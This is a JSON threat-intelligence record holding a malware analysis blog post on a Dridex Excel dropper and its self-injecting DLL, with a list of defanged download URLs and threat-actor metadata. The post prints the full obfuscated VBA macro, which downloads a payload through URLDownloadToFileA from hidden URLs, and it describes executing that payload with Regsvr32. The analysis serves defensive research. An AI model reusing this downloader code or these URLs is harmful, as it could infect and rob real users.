{
	"id": "56d00767-d3d1-4716-b075-e7d78174ed0d",
	"created_at": "2026-04-06T00:14:44.733949Z",
	"updated_at": "2026-04-10T03:31:09.742564Z",
	"deleted_at": null,
	"sha1_hash": "c68b53b73a4705604a92898971f4f51fe6048c5c",
	"title": "Dridex Malware Analysis [1 Feb 2021]",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3917551,
	"plain_text": "Dridex Malware Analysis [1 Feb 2021]\r\nPublished: 2021-02-07 · Archived: 2026-04-05 23:42:08 UTC\r\nDridex, also known as Bugat and Cridex, is a banking trojan and infostealer operated by the criminal group referred to as “Indrik Spider” [1]. Dridex specializes in stealing banking credentials and is delivered through macros in Microsoft Office documents such as Word and Excel files. In previously recorded incidents the threat actors have used Dridex as the entry point for hitting high-value targets with ransomware [2].\r\nIn this post I present the reverse engineering of a recent Dridex sample found in the wild earlier this February. The analysis highlights the techniques and code used by the threat actor, as well as the method used to analyze this sample and extract hidden IOCs and files that the sandbox did not detect. Note that different labs obtained different artifacts and indicators, so this work is a contribution alongside other security labs and researchers. The malware has two stages: the first is an Excel file with an embedded VBA macro that infects the system with a DLL file, which then runs as a process in the second stage.\r\nFile Name | SHA256 | File Size\r\nprintouts_of_outstanding_as_of FEB_01_2021.xlsm | b721618810b06ed4089d1469fc5c5b37be1a907fc1ae14222f913c6e2b0001c2 | 115.81 KB\r\nlibeay32.dll | 26a659ec56c7bd7b83a2f968626c1524bda829e0fefff37ecf4c4fb55ad158e3 | 570.00 KB\r\n[Table 1] Samples Basic Properties, Ref: Any.Run [3] [4]\r\n1. Excel File with Locked Macro\r\nWhat appears to be an invoice delivered via email on the first day of the month is a malicious spreadsheet. The XLSM extension indicates that the workbook carries a macro (the M stands for macro); the code only runs when the macro feature is enabled and the user clicks on the sheet. What look like cells containing numbers are just images linked to the macro.\r\n[Figure 1]\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 1 of 16\r\nThere are three hidden sheets and a locked macro. Locked does not mean password protected; it means the VBA project is locked and, in this particular case, cannot be extracted and reused in a new Excel workbook.\r\n[Figure 2]\r\nDebugging this sample requires two steps:\r\nFirst: extract the sample and locate the stream that holds the macro using oledump.py. The macro is located in the fifth stream, which contains VBA code.\r\n[Figure 3] Oledump on a Linux machine\r\nBelow is the extracted code:\r\n#If VBA7 And Win64 Then\r\n Private Declare PtrSafe Function yellow_pages Lib \"urlmon\" _\r\n Alias \"URLDownloadToFileA\" ( _\r\n ByVal pCaller As LongPtr, _\r\n ByVal szURL As String, _\r\n ByVal szFileName As String, _\r\n ByVal dwReserved As LongPtr, _\r\n ByVal lpfnCB As LongPtr _\r\n ) As Long\r\n#Else\r\n Private Declare Function yellow_pages Lib \"urlmon\" _\r\n Alias \"URLDownloadToFileA\" ( _\r\n ByVal pCaller As Long, _\r\n ByVal szURL As String, _\r\n ByVal szFileName As String, _\r\n ByVal dwReserved As Long, _\r\n ByVal lpfnCB As Long _\r\n ) As Long\r\n#End If\r\nFunction last_counter_a(nimo As Variant) As String\r\nRandomize: df = 2 - 1: last_counter_a = nimo(Int((UBound(nimo) + df) * Rnd))\r\nEnd Function\r\nSub Prv_invoice()\r\nRoLo = Split(RTrim(first_prepayment), progress_bars(\")\"))\r\nSheets(1).Cells(3, 1).Name = \"ForA_\" \u0026 \"s\"\r\nstorages = Split(RoLo(1), progress_bars(\"+\"))\r\nFor A = 0 To UBound(storages) - LBound(storages) + 1\r\nOn Error Resume Next\r\nSheets(1).Cells(3, 1).Value = \"=\" \u0026 storages(A)\r\nRun (\"ForA_\" \u0026 \"s\")\r\nIf A = 12 Then A_min_1 = re_order:\r\nIf A = 14 Then\r\nvega = re_order\r\nyellow_pages 0, date_to_date(last_counter_a(Split(RoLo(0), progress_bars(\"D\")))), A_min_1 \u0026 \"\\\" \u0026 vega, 0, 0\r\nEnd If\r\nNext\r\nEnd Sub\r\nFunction re_order()\r\nre_order = Sheets(1).Range(\"B1:B5\").SpecialCells(xlCellTypeConstants)\r\nEnd Function\r\nPublic Function date_to_date(rr As String)\r\ndate_to_date = Right(rr, Len(rr) - 1)\r\nEnd Function\r\nFunction first_prepayment()\r\nDim cooperation As String\r\nDim rest_che As String: Dim value_cargos As String\r\nDim u As Integer: cooperation = accouintis(4)\r\nrest_che = accouintis(3): value_cargos = accouintis(2)\r\nFor u = 1 To Len(cooperation)\r\nrezzzult = rezzzult \u0026 book_rebook(cooperation, u) \u0026 book_rebook(rest_che, u) \u0026 book_rebook(value_cargos, u)\r\nNext\r\nfirst_prepayment = RTrim(rezzzult)\r\nEnd Function\r\nFunction accouintis(d As Integer)\r\nFor Each ds In Sheets(d).UsedRange.SpecialCells(xlCellTypeConstants): forTwo = forTwo \u0026 ds: accouintis = forTwo\r\nNext\r\nEnd Function\r\nFunction progress_bars(df As String)\r\nprogress_bars = Replace(String(4, \"Z\"), \"Z\", df)\r\nEnd Function\r\nFunction book_rebook(y As String, k As Integer)\r\nbook_rebook = Mid(y, k, 1)\r\nEnd Function\r\nSecond: unlock the document using the EvilClippy tool [5], which removes the locked macro. Open the unlocked version, create a new macro and paste the VBA code above. Previous incidents involving Dridex have also noted the use of EvilClippy.\r\n[Figure 4] Unlocking the xlsm file\r\nBefore debugging the code: the main sheet and the three hidden ones contain white-colored characters spread among the cells over a 7×7000 area. After some cleaning they appear to be random, but not encoded. Below are the sheet characters.\r\n[Figure 5] Random cells from the Excel file\r\n[Figure 6] Characters extracted and cleaned from the three sheets\r\nSheet1\r\ndt:lsawoqnczDDts/amki.thhm.rDhp/asrotnsezv2zDDts/kaacrohw.pDhp/ia.inbnitaidliiD1t:ruehoj0izDDts/slntnthoqoh.rDhp/wkxec/c06\r\nSheet 2\r\nhp/esd.m221iDlt:sraense5bkrDDts/khelisi/u6uiDst:shlmh.mvmzDDts/brahtastecnc8.pDhp/cta.m3zniDjt:aaa.zfe.mvxzrDDts/wnfdomjn.\r\nSheet 3\r\nts/nhoc/5y.pDhp/hkrtgi/vbxaDtt:leosuo.tvqc.pDhp/iwsaac/pwiD6t:lryramitu../bfzDDts/orcc/oh.pDhp/lqimiocc/eu8aD3t:w.oe.mry5z\r\nWhen debugging the code, the random characters spread across the sheet cells start forming three arrays. Reading them top to bottom, one character at a time, they turn out to be URLs. Running the code to completion generates over 100 URLs; all of them are listed in Appendix A.\r\n[Figure 7] Debugging the VBA code\r\nAfter re-debugging multiple times, two random IOCs are generated on each run: the URL of the download site and the DLL file name. What is interesting is that some of the generated URLs are not in the list in Appendix A, and that is what Dridex is all about. Below are three samples of randomly generated IOCs. Further IOCs can be found on VT [6].\r\n[Figure 8] Dropped DLL file\r\n[Figure 9] Date-to-Date function selected URL\r\nFinally, this stage ends by creating a process that uses Regsvr32.exe to run the created DLL. The third hidden sheet contains the end/exit function of the VBA. A temporary file generated in the %TEMP% folder holds a cached version of the macro. Other network and host-based IOCs are found on VT.\r\n[Figure 10]\r\nFile Name | SHA256\r\n~DFDC192FF5186970D5.TMP | 77AA147FC137EBB5FA8865DAE56ABC21A66E87B8454125666A6F80F589A0005C\r\n[Table 2] Temporary File Created\r\n2. DLL File with Self-Injection\r\nAt the time of writing this post, 13/69 VT engines have detected this file as malicious [7].\r\n[Figure 11] VT\r\nThis binary had never been seen before the incident, and its compile time is from 2009. Beyond that, there are a couple of indicators that this file is suspicious, such as the file size compared to the strings, the imported and exported sections, and the resources section.\r\n[Figure 12] PeStudio view of the original DLL file\r\n[Figure 13]\r\nWhen loading this binary in IDA, there is too much gray and too little code and resources. The binary is not detected as packed by Detect It Easy or PEiD, but it has high entropy.\r\n[Figure 14] IDA\r\nAfter a few rounds in x32dbg it appears that this binary uses a DLL self-injection technique [8]. Put simply, hidden code overwrites the original PE file with a new file during runtime. The technique first allocates memory for the hidden code, then extracts the code into that memory region. The overwrite happens in memory at runtime, and catching it requires two breakpoints (VirtualProtect and VirtualAlloc). Once a certain memory region is hit, it is possible to extract it.\r\nAfter a few runs, reaching the EntryPoint in x32dbg and being on the right module with the right settings, it is time to set the breakpoints.\r\n[Figure 15] EntryPoint of DLL file\r\n[Figure 16] BreakPoints\r\nAfter hitting Run (F9) a few times you reach a \u003cVirtualAlloc\u003e breakpoint which, judging by the EAX register, appears to have reserved some space.\r\n[Figure 17] Reaching the breakpoint\r\nBefore running to the next breakpoint, let's verify what has been allocated by setting a breakpoint on the return (ret) or simply using Run Until Return [Figure 18]. On return from this function, some random data has filled up EAX [Figure 19].\r\n[Figure 18] Empty EAX Register\r\n[Figure 19] EAX Register After Return\r\nUsing Follow in Memory Map, the memory region has Execute, Read and Write permissions, which is a sign of hidden code to be executed in the next steps.\r\n[Figure 20] Memory Map x32dbg\r\nAfter another Run (F9), execution stops at a second \u003cVirtualAlloc\u003e breakpoint that reserves more space in memory; checking the dumped value of EAX shows nothing yet. The newly allocated region also has ERW permissions. It is the same as the previous \u003cVirtualAlloc\u003e stop, but this time at a different memory location and with different gibberish values.\r\n[Figure 21] Second VirtualAlloc Breakpoint\r\nThe next Run (F9) stops at \u003cVirtualProtect\u003e; when dumping the EAX register there appears to be something close to an MZ header! Checking the dumped values shows some normal ASCII characters that resemble an executable binary. Reaching this point means the next Run (F9) will overwrite the original PE (libeay32.dll, in this case) with the new file.\r\n[Figure 22]\r\n[Figure 23] Packed Executable\r\nIt is possible to dump the memory region from the x32dbg Memory Map, but alternatives such as ProcessHacker are sometimes better. Run ProcessHacker in administrative mode \u003e select the process running inside x32dbg \u003e open Properties \u003e Memory tab \u003e locate the same memory region (0x24f0000, a dynamic value that differs on each run) \u003e right-click and save.\r\n[Figure 24] ProcessHacker dumping memory\r\nWhen loading this dumped binary in PE-bear, it appears to have no Imports. That is normal because it was dumped from memory, but it requires a fix to get things right.\r\n[Figure 25] PE-bear Imports section\r\nThe fix requires setting the ‘Raw Addresses’ of the sections to match their ‘Virtual Addresses’ in this binary. Once the values match, the Imports section is fixed and shows the DLL values.\r\n[Figure 26] PE-bear Fixing Raw Addresses\r\nCompared with [Figure 12], the newly dumped file appears to be an entirely different binary, with a new compile time of Sep 2020, unlike the original PE which shows a compile time of 2009.\r\n[Figure 27] Pestudio look of the new binary\r\n[Figure 28] Pestudio strings section\r\nFile Name | SHA256 | File Size\r\n24f0000_mem_dump-f.bin | 51C35BE1C816876C4325501641CD04CDDE0814C01DA4762F747B07A6366A6DBE | 624KB\r\n[Table 3] Packed file\r\nAppendix – A\r\nDO NOT click on any URL\r\nhxxps://lensshadow[.]com/q25n2yc1[.]zip\r\nhxxps://sharkmarketing[.]site/h5vhbbmkx[.]rar\r\nhxxps://lakeshoresolutions[.]site/vzuqv6c2u[.]zip\r\nhxxps://sikhwalsamachar[.]com/hvpwmw[.]zip\r\nhxxps://library[.]arihantmbainstitute[.]ac[.]in/dcbl8fi[.]zip\r\nhxxps://rcoutreach[.]com/j3o0zhin[.]zip\r\nhxxps://alsaqlain[.]mtzinfotech[.]com/qveoxuhz8[.]rar\r\nhxxps://www[.]knoxfeed[.]com/mrcjy0n56[.]zip\r\nhxxps://www[.]msctahmedabad[.]com/ap7frbox[.]rar\r\nhxxps://compremaisaqui[.]com[.]br/hvsz2tddd[.]zip\r\nhxxps://greengluecompound[.]com/dtyhtl07[.]zip\r\nhxxps://utah[.]localcitycenter[.]com/vysme8[.]zip\r\nhxxps://marscereals[.]com/zkx0fhja1[.]rar\r\nhxxps://pinara[.]biz/ubtrfi[.]zip\r\nhxxps://shop[.]zoomangle[.]com/c3f7z1wc[.]zip\r\nhxxps://haifacollege[.]org[.]il/m00zz5i0[.]zip\r\nhxxps://allmobilezone[.]com/nrx7d41xr[.]rar\r\nhxxps://bullseyemedia[.]in/d8kya9v[.]zip\r\nhxxps://makedacare[.]com/gzx066[.]rar\r\nhxxps://m[.]localcitycenter[.]com/m41ntxsdi[.]rar\r\nhxxps://rklkpgcollege[.]com/q159te[.]rar\r\nhxxps://hesedorg[.]org/ghbxb7[.]zip\r\nhxxps://ngo[.]edusprit[.]com/e0ix7dxta[.]zip\r\nhxxps://gutech[.]com[.]sa/yo4fz9[.]zip\r\nhxxps://bcrg[.]co[.]za/tegx1a[.]rar\r\nhxxps://app[.]cutisclinics[.]com/gks0cu[.]rar\r\nhxxps://pulaski[.]website/rbv9d79[.]zip\r\nhxxps://daniel[.]idevs[.]site/pia5bsykl[.]zip\r\nhxxps://neumaservicios[.]com[.]ar/qf3wgtie7[.]rar\r\nhxxps://ssntrs[.]gm-computindo[.]com/mwo3b1[.]rar\r\nhxxps://huffingtontribune[.]com/talt7wf[.]zip\r\nhxxps://athenacapsg[.]com/vqwslkvgx[.]zip\r\nhxxps://www[.]mareterra[.]com[.]co/vyjjiu[.]zip\r\nhxxps://ilovedaybreak[.]com/z1rv2dy[.]rar\r\nhxxps://aromatherapy[.]a1oilindia[.]in/vtdeudnic[.]zip\r\nhxxps://netaqplus[.]com/xo0luusml[.]zip\r\nhxxps://web[.]thebeessolution[.]com/c0w5alb[.]zip\r\nhxxps://gc3m[.]info/n69ym3bk[.]zip\r\nhxxps://web[.]thebeessolution[.]com/c0w5alb[.]zip\r\nhxxps://srichaitanyacollegenlg[.]com/og3wncuv[.]zip\r\nhxxps://www[.]spittinfire[.]com/imrgqn59[.]rar\r\nhxxps://eltrendelossuenios[.]com[.]ar/ttblf99i[.]zip\r\nhxxps://uk[.]idevs[.]site/jn2yx3[.]zip\r\nhxxps://gaiapeaks[.]site/fyoja23[.]rar\r\nhxxps://jumaa[.]boldcreationsnam[.]com/okhq50[.]zip\r\nhxxps://wp[.]osmangony[.]info/xrmigx[.]zip\r\nhxxps://coriawp[.]elmamamobil[.]com/upj6o9k4c[.]zip\r\nhxxps://khabardarnews[.]in/ldnq5uz[.]zip\r\nhxxps://www[.]iam313[.]com/ojtyptcv[.]zip\r\nhxxps://mobicraftdev[.]mincraftquickskineditor[.]com/vt0l6q61[.]rar\r\nhxxps://herbalextracts[.]a1oilindia[.]in/i2kwwtp[.]zip\r\nhxxps://vegas[.]localcitycenter[.]com/uc5az9i[.]rar\r\nhxxps://egyuttkonnyebb[.]zolitoth[.]com/dm98dcw[.]rar\r\nhxxps://shekharsinstitutenalgonda[.]com/tjgua2[.]rar\r\nhxxps://content-engine[.]rankoneagency[.]com/wirh835i[.]rar\r\nhxxps://taksim[.]co[.]il/g9itqzo[.]rar\r\nhxxps://scholarship[.]osmangony[.]info/pzf3d4h[.]zip\r\nhxxps://kucianohotels[.]ng/eqztobqz[.]rar\r\nhxxps://digitalaxom[.]in/dsd159g72[.]rar\r\nhxxps://dspfoundation[.]com/os7kny3[.]zip\r\nhxxps://55[.]finaldatasolutions[.]com/snlkq6e[.]zip\r\nhxxps://madleneva[.]site/jl0qoqf3[.]rar\r\nhxxps://cadmuswebdesign[.]com/eqoczx[.]zip\r\nhxxps://tryathletelife[.]com/qwyne38m[.]rar\r\nhxxps://emosque[.]info/h7ftuq[.]zip\r\nhxxps://notif1[.]priruz[.]co[.]in/v4fn4tvg5[.]zip\r\nhxxps://sagittalimited[.]site/mzpxej[.]zip\r\nhxxps://cwbbox[.]com[.]br/eipp2c60[.]zip\r\nhxxps://bajacamping[.]elmamamobil[.]com/f63yt5[.]zip\r\nhxxps://lms[.]cstdevs[.]com/r3r1uqedb[.]zip\r\nhxxps://joelbonissilver[.]com/mq6cs9c5[.]zip\r\nhxxps://arjunmajumdar[.]com/i3dsc4[.]rar\r\nhxxps://truelyb[.]com/buiad8ek6[.]rar\r\nhxxps://mraudtee[.]peatus[.]net/y0g3jl5k9[.]zip\r\nhxxps://letspogoyork[.]com/l3vlz8zpf[.]rar\r\nhxxps://ffsurveyors[.]com[.]br/gd22wtgu[.]rar\r\nhxxps://bambootea[.]store/wdbyzv[.]zip\r\nhxxps://hacklady[.]com/p742vtdn[.]rar\r\nhxxps://sreenivasapaintingworks[.]com/pqbtf6[.]rar\r\nhxxps://qurbanakbarindonesia[.]com/tg8gadi[.]zip\r\nhxxps://quintadoabacate[.]com/k5f9m33e8[.]zip\r\nhxxps://leluibuffet[.]com[.]br/hl7esn[.]zip\r\nhxxps://todoapp[.]cstdevs[.]com/dgul98n5x[.]zip\r\nhxxps://salsahd[.]com/tvjysy[.]rar\r\nhxxps://pornonhd[.]com/ik3gp8oc[.]zip\r\nhxxps://alpha-chemistry[.]ir/ys7ur7jk[.]rar\r\nhxxps://edurecruit[.]idevs[.]site/ufkd03[.]zip\r\nhxxps://ecovillefashion[.]com/bysrypj[.]zip\r\nhxxps://tusharagarwal[.]online/zbw09n[.]rar\r\nhxxps://www[.]minuevavida[.]org/g2anr8[.]rar\r\nhxxps://ugateshop[.]com/w4s1pcd[.]zip\r\nhxxps://www[.]adamorinmusic[.]com/g33zak4[.]zip\r\nhxxps://info[.]deftenglish[.]com/r3yprhn1z[.]zip\r\nhxxps://meunikah[.]com/sny0k57qz[.]zip\r\nhxxps://womenwithamandate[.]com/wk920hw0[.]rar\r\nhxxps://cubc[.]elmamamobil[.]com/q8w20z[.]zip\r\nhxxps://jobs[.]thebeessolution[.]com/ifrljo2j0[.]zip\r\nhxxps://strengthrer[.]com/tdz9d1fjw[.]zip\r\nhxxps://agroshowtv[.]com/b5farl[.]rar\r\nhxxps://nicoleth[.]elmamamobil[.]com/mv1fup[.]zip\r\nhxxps://childderm[.]com/e2tpt3[.]rar\r\nhxxps://smithcalendar[.]cstdevs[.]com/qv9p5brpm[.]zip\r\nhxxps://jettaffiliates[.]site/bqluv10q[.]rar\r\nhxxps://bluesteelinfra[.]com/lc0pb00[.]zip\r\nhxxps://texturesbyvinita[.]com/dhzkiuf[.]rar\r\nhxxps://corporativosanluis[.]net/dpeaemem1[.]rar\r\nhxxps://wpcoder[.]io/rsbwunhso[.]zip\r\nhxxps://burbankautoglass[.]net/z9qe5rva2[.]rar\r\nhxxps://api[.]cstdevs[.]com/c4voo0gc[.]rar\r\nhxxps://coltdogracoes[.]com[.]br/d06f6y[.]rar\r\nhxxps://personal[.]personaltrainerfds[.]com/rhiwosfx[.]zip\r\nhxxps://adithimedia[.]com/hr9gbfn[.]zip\r\nhxxps://clickce[.]org/f7qdijx3[.]zip\r\nhxxps://talklivebuddy[.]com/myr00k[.]zip\r\nhxxps://ourvisionopticals[.]store/e6nwgxj8[.]zip\r\nhxxps://gory-store[.]com/wh05c3[.]rar\r\nhxxps://intships[.]com/fbeyyjr[.]zip\r\nhxxps://floralwaters[.]a1oilindia[.]in/psg2sfk[.]zip\r\nhxxps://app[.]prerana[.]info/j972z9[.]zip\r\nhxxps://bpacit[.]in/p3qaf6[.]rar\r\nhxxps://restauranttalksandstories[.]com/owutc3je[.]zip\r\nhxxps://mail[.]wepartnersfiles[.]com/mwu6lp9s[.]zip\r\nhxxps://palbas[.]cl/wm7qb5ph[.]rar\r\nhxxps://coria[.]elmamamobil[.]com/dx1dn4a[.]zip\r\nhxxps://visions[.]alnisamart[.]com/l1l0tal[.]zip\r\nhxxps://lakeshoresolutions[.]site/vzuqv6c2u[.]zip\r\nhxxps://ngo[.]edusprit[.]com/e0ix7dxta[.]zip\r\nhxxps://burbankautoglass[.]net/z9qe5rva2[.]rar\r\nhxxps://nicoleth[.]elmamamobil[.]com/mv1fup[.]zip\r\nhxxps://ngo[.]edusprit[.]com/e0ix7dxta[.]zip\r\nReferences\r\n[1] Indrik Spider, https://malpedia.caad.fkie.fraunhofer.de/actor/indrik_spider\r\n[2] Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware, https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/\r\n[3] Excel file sample, https://app.any.run/tasks/8e693e74-befe-4c01-ad8e-aed066254d5b/\r\n[4] DLL file sample, https://app.any.run/tasks/0a690f3a-3bfa-4490-9022-2057163ea5cc/\r\n[5] EvilClippy GitHub repository, https://github.com/outflanknl/EvilClippy\r\n[6] Excel File VT, https://www.virustotal.com/gui/file/b721618810b06ed4089d1469fc5c5b37be1a907fc1ae14222f913c6e2b0001c2/detection\r\n[7] DLL File VT, https://www.virustotal.com/gui/file/26a659ec56c7bd7b83a2f968626c1524bda829e0fefff37ecf4c4fb55ad158e3/detection\r\n[8] Ten process injection techniques: A technical survey of common and trending process injection techniques, https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process\r\nSource: https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/"
	],
	"report_names": [
		"dridex-malware-analysis"
	],
	"threat_actors": [
		{
			"id": "50068c14-343c-4491-b568-df41dd59551c",
			"created_at": "2022-10-25T15:50:23.253218Z",
			"updated_at": "2026-04-10T02:00:05.234464Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Indrik Spider",
				"Evil Corp",
				"Manatee Tempest",
				"DEV-0243",
				"UNC2165"
			],
			"source_name": "MITRE:Indrik Spider",
			"tools": [
				"Mimikatz",
				"PsExec",
				"Dridex",
				"WastedLocker",
				"BitPaymer",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b296f34c-c424-41da-98bf-90312a5df8ef",
			"created_at": "2024-06-19T02:03:08.027585Z",
			"updated_at": "2026-04-10T02:00:03.621193Z",
			"deleted_at": null,
			"main_name": "GOLD DRAKE",
			"aliases": [
				"Evil Corp",
				"Indrik Spider ",
				"Manatee Tempest "
			],
			"source_name": "Secureworks:GOLD DRAKE",
			"tools": [
				"BitPaymer",
				"Cobalt Strike",
				"Covenant",
				"Donut",
				"Dridex",
				"Hades",
				"Koadic",
				"LockBit",
				"Macaw Locker",
				"Mimikatz",
				"Payload.Bin",
				"Phoenix CryptoLocker",
				"PowerShell Empire",
				"PowerSploit",
				"SocGholish",
				"WastedLocker"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d706edf6-cb86-4611-99e1-4b464e9dc5b9",
			"created_at": "2023-01-06T13:46:38.839083Z",
			"updated_at": "2026-04-10T02:00:03.117987Z",
			"deleted_at": null,
			"main_name": "INDRIK SPIDER",
			"aliases": [
				"Manatee Tempest"
			],
			"source_name": "MISPGALAXY:INDRIK SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9806f226-935f-48eb-b138-6616c9bb9d69",
			"created_at": "2022-10-25T16:07:23.73153Z",
			"updated_at": "2026-04-10T02:00:04.729977Z",
			"deleted_at": null,
			"main_name": "Indrik Spider",
			"aliases": [
				"Blue Lelantos",
				"DEV-0243",
				"Evil Corp",
				"G0119",
				"Gold Drake",
				"Gold Winter",
				"Manatee Tempest",
				"Mustard Tempest",
				"UNC2165"
			],
			"source_name": "ETDA:Indrik Spider",
			"tools": [
				"Advanced Port Scanner",
				"Agentemis",
				"Babuk",
				"Babuk Locker",
				"Babyk",
				"BitPaymer",
				"Bugat",
				"Bugat v5",
				"Cobalt Strike",
				"CobaltStrike",
				"Cridex",
				"Dridex",
				"EmPyre",
				"EmpireProject",
				"FAKEUPDATES",
				"FakeUpdate",
				"Feodo",
				"FriedEx",
				"Hades",
				"IEncrypt",
				"LINK_MSIEXEC",
				"MEGAsync",
				"Macaw Locker",
				"Metasploit",
				"Mimikatz",
				"PayloadBIN",
				"Phoenix Locker",
				"PowerShell Empire",
				"PowerSploit",
				"PsExec",
				"QNAP-Worm",
				"Raspberry Robin",
				"RaspberryRobin",
				"SocGholish",
				"Vasa Locker",
				"WastedLoader",
				"WastedLocker",
				"cobeacon",
				"wp_encrypt"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434484,
	"ts_updated_at": 1775791869,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c68b53b73a4705604a92898971f4f51fe6048c5c.pdf",
		"text": "https://archive.orkl.eu/c68b53b73a4705604a92898971f4f51fe6048c5c.txt",
		"img": "https://archive.orkl.eu/c68b53b73a4705604a92898971f4f51fe6048c5c.jpg"
	}
}